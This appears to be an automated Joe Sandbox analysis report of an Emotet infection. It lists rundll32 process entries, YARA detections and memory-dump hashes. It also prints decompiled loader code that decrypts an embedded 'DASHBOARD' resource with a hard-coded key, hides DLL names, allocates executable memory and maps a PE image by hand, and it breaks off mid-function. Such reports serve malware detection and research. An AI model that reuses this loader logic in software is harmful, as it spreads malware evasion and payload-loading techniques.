                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:high

                                                                                                                  Target ID:14
                                                                                                                  Start time:21:02:35
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                                                                                                  Target ID:15
                                                                                                                  Start time:21:02:39
                                                                                                                  Start date:28/01/2022
                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
                                                                                                                  Imagebase:0x650000
                                                                                                                  File size:44544 bytes
                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:

                                                                                                                  Reset < >
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418543494.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F4000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_32f3000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ae25d32e65c05977671369c39f00726c5a379b3512cb0a43af8a2f43b10a31b
                                                                                                                    • Instruction ID: 70b70b4003278331a3c2e2747d854babbd2902cf537cab32da1b76d1cfdcadc4
                                                                                                                    • Opcode Fuzzy Hash: 1ae25d32e65c05977671369c39f00726c5a379b3512cb0a43af8a2f43b10a31b
                                                                                                                    • Instruction Fuzzy Hash: E351F43062CA484FCB48FB1D9845A22F7D1FB5C704B5880EEE58AC7396DA64DCD18796
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418543494.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_32f3000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ae25d32e65c05977671369c39f00726c5a379b3512cb0a43af8a2f43b10a31b
                                                                                                                    • Instruction ID: 70b70b4003278331a3c2e2747d854babbd2902cf537cab32da1b76d1cfdcadc4
                                                                                                                    • Opcode Fuzzy Hash: 1ae25d32e65c05977671369c39f00726c5a379b3512cb0a43af8a2f43b10a31b
                                                                                                                    • Instruction Fuzzy Hash: E351F43062CA484FCB48FB1D9845A22F7D1FB5C704B5880EEE58AC7396DA64DCD18796
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418543494.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F4000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_32f3000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17281a31a910e7369ce14be9be9e1e2d0d72dc1cc6552873a080492646b7b9cb
                                                                                                                    • Instruction ID: 718d43d39e58b560a1272f93f53fea97b17f65d7f18f12e82d139fba6ea56024
                                                                                                                    • Opcode Fuzzy Hash: 17281a31a910e7369ce14be9be9e1e2d0d72dc1cc6552873a080492646b7b9cb
                                                                                                                    • Instruction Fuzzy Hash: 85D0223421C7C80FC315B73820140697BA1CB1F2C432850CA89CAC7343DD400CC18353
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418543494.00000000032F3000.00000010.00000800.00020000.00000000.sdmp, Offset: 032F3000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_32f3000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17281a31a910e7369ce14be9be9e1e2d0d72dc1cc6552873a080492646b7b9cb
                                                                                                                    • Instruction ID: 718d43d39e58b560a1272f93f53fea97b17f65d7f18f12e82d139fba6ea56024
                                                                                                                    • Opcode Fuzzy Hash: 17281a31a910e7369ce14be9be9e1e2d0d72dc1cc6552873a080492646b7b9cb
                                                                                                                    • Instruction Fuzzy Hash: 85D0223421C7C80FC315B73820140697BA1CB1F2C432850CA89CAC7343DD400CC18353
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000003.418655141.0000000002C40000.00000010.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_3_2c40000_mshta.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction ID: ed9e52ba67b6bba4a2dc3bb6c92bce0355d7fa9dd7b473c0ee579060826d6020
                                                                                                                    • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.678828554.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e0d2e070fa14f4f7caa9ad7120c51440c5463161024b57db53a4ac46e29cc310
                                                                                                                    • Instruction ID: 3de0f51dd149ed79ffb9d7f138d5a5522eb7fa8718c8c229c612fa17cf5d7a6c
                                                                                                                    • Opcode Fuzzy Hash: e0d2e070fa14f4f7caa9ad7120c51440c5463161024b57db53a4ac46e29cc310
                                                                                                                    • Instruction Fuzzy Hash: 4E715720A0EBC64FE75357785C6A6A17FF09F57210B0E41EBD488CB0A3D948999AC362
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.678828554.000007FF00270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00270000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff00270000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ab90af5b409d8085e118bd7239a72e1385613ec267adc406c5f10e6ef1a440f8
                                                                                                                    • Instruction ID: fea371928174f7ccd6b9209cd4da85a268a5e576f038f98be58ea2ac25bf1c55
                                                                                                                    • Opcode Fuzzy Hash: ab90af5b409d8085e118bd7239a72e1385613ec267adc406c5f10e6ef1a440f8
                                                                                                                    • Instruction Fuzzy Hash: 6E410D6194E7C28FE71357785CA92A07FB0AF57210B0E04EBD488CF0A3E5588D9AD362
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:16.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                    Signature Coverage:21.9%
                                                                                                                    Total number of Nodes:297
                                                                                                                    Total number of Limit Nodes:23

                                                                                                                    Control-flow Graph

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				void* _v8;
                                                                                                                    				void* _v12;
                                                                                                                    				intOrPtr _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				short _v22;
                                                                                                                    				short _v24;
                                                                                                                    				short _v26;
                                                                                                                    				short _v28;
                                                                                                                    				short _v30;
                                                                                                                    				short _v32;
                                                                                                                    				short _v34;
                                                                                                                    				short _v36;
                                                                                                                    				short _v38;
                                                                                                                    				char _v40;
                                                                                                                    				void* _v44;
                                                                                                                    				void* _v48;
                                                                                                                    				long _v52;
                                                                                                                    				void* _v56;
                                                                                                                    				struct HRSRC__* _v60;
                                                                                                                    				short _v64;
                                                                                                                    				short _v66;
                                                                                                                    				short _v68;
                                                                                                                    				short _v70;
                                                                                                                    				short _v72;
                                                                                                                    				short _v74;
                                                                                                                    				short _v76;
                                                                                                                    				short _v78;
                                                                                                                    				short _v80;
                                                                                                                    				short _v82;
                                                                                                                    				short _v84;
                                                                                                                    				short _v86;
                                                                                                                    				char _v88;
                                                                                                                    				intOrPtr _v92;
                                                                                                                    				void* __ebp;
                                                                                                                    				signed int _t66;
                                                                                                                    				void* _t70;
                                                                                                                    				void* _t72;
                                                                                                                    				struct HRSRC__* _t74;
                                                                                                                    				void* _t78;
                                                                                                                    				intOrPtr _t92;
                                                                                                                    				void* _t93;
                                                                                                                    				void* _t95;
                                                                                                                    				intOrPtr _t104;
                                                                                                                    				signed int _t120;
                                                                                                                    				void* _t121;
                                                                                                                    
                                                                                                                    				_t119 = __esi;
                                                                                                                    				_t118 = __edi;
                                                                                                                    				_t96 = __ebx;
                                                                                                                    				_t66 =  *0x100545cc; // 0x3f6a93de
                                                                                                                    				_v20 = _t66 ^ _t120;
                                                                                                                    				_v92 = _a8;
                                                                                                                    				 *0x10055a80 = _a4;
                                                                                                                    				_t109 = _a8;
                                                                                                                    				 *0x10055a84 = _a8;
                                                                                                                    				 *0x10055a88 = _a12;
                                                                                                                    				_v8 = 0;
                                                                                                                    				_v52 = 0;
                                                                                                                    				_v44 = 0;
                                                                                                                    				_v48 = 0;
                                                                                                                    				_v12 = 0;
                                                                                                                    				_t70 = E10006A90(__eflags); // executed
                                                                                                                    				_t131 = _t70;
                                                                                                                    				if(_t70 != 0) {
                                                                                                                    					_push(0x10046758);
                                                                                                                    					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
                                                                                                                    					_t72 = 0;
                                                                                                                    				} else {
                                                                                                                    					 *0x100530b8 = 0;
                                                                                                                    					 *0x100530bc = 0;
                                                                                                                    					 *0x100530c0 = 0;
                                                                                                                    					 *0x100530c8 = 0;
                                                                                                                    					 *0x100530c4 = 0;
                                                                                                                    					 *0x100530cc = 0;
                                                                                                                    					_v60 = 0;
                                                                                                                    					_v56 = 0;
                                                                                                                    					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
                                                                                                                    					_v60 = _t74;
                                                                                                                    					_v56 = LoadResource(_a4, _v60);
                                                                                                                    					_v52 = SizeofResource(_a4, _v60);
                                                                                                                    					_v88 = 0x6b;
                                                                                                                    					_v86 = 0x65;
                                                                                                                    					_v84 = 0x72;
                                                                                                                    					_v82 = 0x6e;
                                                                                                                    					_v80 = 0x65;
                                                                                                                    					_v78 = 0x6c;
                                                                                                                    					_v76 = 0x33;
                                                                                                                    					_v74 = 0x32;
                                                                                                                    					_v72 = 0x2e;
                                                                                                                    					_v70 = 0x64;
                                                                                                                    					_v68 = 0x6c;
                                                                                                                    					_v66 = 0x6c;
                                                                                                                    					_v64 = 0;
                                                                                                                    					_v40 = 0x6e;
                                                                                                                    					_v38 = 0x74;
                                                                                                                    					_v36 = 0x64;
                                                                                                                    					_v34 = 0x6c;
                                                                                                                    					_v32 = 0x6c;
                                                                                                                    					_v30 = 0x2e;
                                                                                                                    					_v28 = 0x64;
                                                                                                                    					_v26 = 0x6c;
                                                                                                                    					_v24 = 0x6c;
                                                                                                                    					_v22 = 0;
                                                                                                                    					_t78 = E10006A90(_t131); // executed
                                                                                                                    					if(_t78 == 0) {
                                                                                                                    						_t45 =  &_v88; // 0x6b
                                                                                                                    						_t95 = E100048E0(_t45);
                                                                                                                    						_t121 = _t121 + 4;
                                                                                                                    						_v44 = _t95;
                                                                                                                    					}
                                                                                                                    					_t47 =  &_v40; // 0x6e
                                                                                                                    					_v48 = E100048E0(_t47);
                                                                                                                    					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
                                                                                                                    					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
                                                                                                                    					_t133 =  *0x10055a78;
                                                                                                                    					if( *0x10055a78 == 0) {
                                                                                                                    						__eflags = 0x2000;
                                                                                                                    						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
                                                                                                                    					} else {
                                                                                                                    						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
                                                                                                                    						_v12 = _t93;
                                                                                                                    					}
                                                                                                                    					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
                                                                                                                    					_t104 =  *0x100530b4; // 0x2795
                                                                                                                    					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
                                                                                                                    					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
                                                                                                                    					_t109 = _v16;
                                                                                                                    					E10003EE0(_v16, _v12, _v52);
                                                                                                                    					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
                                                                                                                    					 *0x10055a8c = _t92;
                                                                                                                    					_t72 = 1;
                                                                                                                    				}
                                                                                                                    				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
                                                                                                                    			}

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                    • _printf.LIBCMT ref: 1001265F
                                                                                                                    • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                    • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                    • _malloc.LIBCMT ref: 100127F5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                    • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                    • API String ID: 572389289-2839844625
                                                                                                                    • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                    • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                    • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                    • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                    				void* _v8;
                                                                                                                    				void* _v12;
                                                                                                                    				signed short* _v16;
                                                                                                                    				void* _v20;
                                                                                                                    				void* _v24;
                                                                                                                    				long _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				intOrPtr _v64;
                                                                                                                    				char _v68;
                                                                                                                    				void* _v72;
                                                                                                                    				intOrPtr _v76;
                                                                                                                    				intOrPtr* _v80;
                                                                                                                    				intOrPtr _v84;
                                                                                                                    				void* _v88;
                                                                                                                    				intOrPtr _v92;
                                                                                                                    				intOrPtr _v96;
                                                                                                                    				intOrPtr _v100;
                                                                                                                    				void* _t180;
                                                                                                                    				void* _t191;
                                                                                                                    				void* _t198;
                                                                                                                    				void* _t202;
                                                                                                                    				intOrPtr _t209;
                                                                                                                    				void* _t220;
                                                                                                                    				intOrPtr _t269;
                                                                                                                    				intOrPtr _t278;
                                                                                                                    				intOrPtr _t326;
                                                                                                                    
                                                                                                                    				_v100 = __ecx;
                                                                                                                    				_v72 = 0;
                                                                                                                    				_v20 = 0;
                                                                                                                    				if(E10001990(_v100, _a8, 0x40) != 0) {
                                                                                                                    					_v16 = _a4;
                                                                                                                    					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
                                                                                                                    						_t10 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                    						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
                                                                                                                    							_t15 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                    							_v80 = _a4 +  *_t15;
                                                                                                                    							if( *_v80 == 0x4550) {
                                                                                                                    								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
                                                                                                                    									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
                                                                                                                    										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                    										_v32 =  *(_v80 + 0x38);
                                                                                                                    										_v12 = 0;
                                                                                                                    										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
                                                                                                                    											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
                                                                                                                    												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
                                                                                                                    											} else {
                                                                                                                    												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
                                                                                                                    											}
                                                                                                                    											if(_v88 > _v20) {
                                                                                                                    												_v20 = _v88;
                                                                                                                    											}
                                                                                                                    											_v12 = _v12 + 1;
                                                                                                                    											_v84 = _v84 + 0x28;
                                                                                                                    										}
                                                                                                                    										__imp__GetNativeSystemInfo( &_v68); // executed
                                                                                                                    										_t59 = _v64 - 1; // 0x71
                                                                                                                    										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
                                                                                                                    										_t65 = _v64 - 1; // -1
                                                                                                                    										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
                                                                                                                    											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
                                                                                                                    											_v24 = _t180;
                                                                                                                    											if(_v24 != 0) {
                                                                                                                    												L26:
                                                                                                                    												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
                                                                                                                    												if(_v72 != 0) {
                                                                                                                    													 *((intOrPtr*)(_v72 + 4)) = _v24;
                                                                                                                    													asm("sbb edx, edx");
                                                                                                                    													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
                                                                                                                    													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
                                                                                                                    													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
                                                                                                                    													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
                                                                                                                    													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
                                                                                                                    													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
                                                                                                                    													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
                                                                                                                    														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
                                                                                                                    														_v8 = _t191;
                                                                                                                    														E10001810(_v8, _v16,  *(_v80 + 0x54));
                                                                                                                    														_t115 =  &(_v16[0x1e]); // 0xfffefe57
                                                                                                                    														 *_v72 = _v8 +  *_t115;
                                                                                                                    														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
                                                                                                                    														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
                                                                                                                    														if(_t198 != 0) {
                                                                                                                    															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
                                                                                                                    															_v76 = _t269;
                                                                                                                    															if(_t269 == 0) {
                                                                                                                    																 *((intOrPtr*)(_v72 + 0x18)) = 1;
                                                                                                                    															} else {
                                                                                                                    																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
                                                                                                                    															}
                                                                                                                    															if(E10001FF0(_v100, _v72) != 0) {
                                                                                                                    																_t202 = E10001CB0(_v100, _v72); // executed
                                                                                                                    																if(_t202 != 0) {
                                                                                                                    																	if(E10001E30(_v100, _v72) != 0) {
                                                                                                                    																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
                                                                                                                    																			 *(_v72 + 0x2c) = 0;
                                                                                                                    																			L49:
                                                                                                                    																			return _v72;
                                                                                                                    																		}
                                                                                                                    																		if( *(_v72 + 0x14) == 0) {
                                                                                                                    																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                    																			L47:
                                                                                                                    																			goto L49;
                                                                                                                    																		}
                                                                                                                    																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
                                                                                                                    																		_t209 =  *0x10055a88; // 0x0
